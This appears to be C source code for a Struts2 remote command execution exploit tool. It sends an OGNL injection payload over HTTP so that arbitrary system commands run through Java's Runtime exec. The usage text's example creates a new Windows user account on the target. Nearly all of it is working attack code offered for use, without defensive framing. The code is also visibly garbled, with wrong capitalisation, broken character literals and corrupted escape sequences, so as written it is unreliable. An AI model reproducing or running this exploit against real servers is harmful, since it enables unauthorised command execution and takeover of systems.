# Include <stdio. h>
# Include <windows. h>
# Pragma comment (lib, "ws2_32.lib ")
SOCKET sock;
Struct sockaddr_in client;
WSADATA wsa;
Struct hostent * host;
Int InitSocket (char * Host, unsigned int Port)
{
If (WSAStartup (MAKEWORD (2, 2), & wsa )! = 0)
{
Printf ("[-] WSAStartup Error! ");
Return 0;
}
Try
{
Host = gethostbyname (Host );
Memcpy (& client. sin_addr.S_un.S_addr, host-> h_addr_list [0], sizeof (host-> h_addr_list [0]);
Client. sin_family = AF_INET;
Client. sin_port = htons (Port );
} Catch (...)
{
Printf ("[-] socket_inaddr init error! ");
Return 0;
}
Sock = socket (AF_INET, SOCK_STREAM, 0 );
If (sock = SOCKET_ERROR)
{
Printf ("[-] socket create error! ");
WSACleanup ();
Return 0;
}
Printf ("[+] Socket Init success! ");
Return 1;
}
Int ConnectServer (char * Host, unsigned int Port)
{
Printf ("Init socket ...");
If (! InitSocket (Host, Port) return 0;
Printf ("Connect the Server ...");
If (connect (sock, (struct sockaddr *) & client, sizeof (client) = SOCKET_ERROR)
{
Printf ("[-] Connect Error! ");
Closesocket (sock );
WSACleanup ();
Return 0;
}
Printf ("[+] Connect successfull! ");
Return 1;
}
Char * HttpGet (char * Host, unsigned int Port, char * Req)
{
Int size;
Char http_header [] = "GET/% s HTTP/1.1"
"Host: % s"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.9.2.12) Gecko/20101026 Firefox/3.6.12"
"Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8"
"Accept-Language: zh-cn, zh; q = 0.5"
"Accept-Encoding: gzip, deflate"
"Accept-Charset: GB2312, UTF-8; q = 0.7, *; q = 0.7"
"Connection: Closed ";
Char req_buf [4096], recvbuf [20480], * ret;
Sprintf (req_buf, http_header, Req, Host );
If (! ConnectServer (Host, Port) exit (0 );
Printf ("Send payload: % s", req_buf );
Size = send (sock, req_buf, strlen (req_buf), 0 );
Printf ("[+] send payload % d bytes! ", Size );
Size = recv (sock, recvbuf, sizeof (recvbuf), 0 );
Printf ("[+] Response: % s", recvbuf );
Ret = size> 0? Recvbuf: NULL;
Closesocket (sock );
WSACleanup ();
Return ret;
}
Void usage ()
{
Printf ("Struts2 Remote Command Exploitconcat: ylbhz@hotmail.com ");
Printf ("Usage: struts2exp <target> <port> <reqfile> <cmd> ");
Printf ("Example: struts2exp localhost 8080 struts2Test/index. action" net user ylbhz 123/add "");
Exit (-1 );
}
Char * handlecmd (char * cmd) // process the cmd command, replace the space with +
{
Char * ret = (char *) malloc (sizeof (char) * 256 );
Int I = 0;
Char tmp;
While (tmp = cmd [I])
{
If (tmp =)
Ret [I] = +;
Else
Ret [I] = tmp;
I ++;
}
Ret [I] = NULL;
Return ret;
}
Void main (int argc, char * argv [])
{
If (argc! = 5) usage ();
Unsigned int Port = (unsigned int) atoi (argv [2]);
If (Port <= 0) usage ();
Char * Target = argv [1];
Char * ReqFile = argv [3];
Char * cmd = argv [4];
Char payload [] = "% s? (\ U0023_memberAccess [\ allowStaticMethodAccess \]) (meh) = true & (aaa) (\ u0023context [\ xwork. methodAccessor. denyMethodExecution \] \ u003d \ u0023foo) (\ u0023foo \ u003dnew + java. lang. boolean ("false") & (asdf) (\ u0023rt.exe c ("% s") (\ u0023rt \ u003d@java.lang.Runtime @ getRuntime () = 1 ";
Char sendbuf [2048];
Sprintf (sendbuf, payload, ReqFile, handlecmd (cmd ));
HttpGet (Target, Port, sendbuf );
}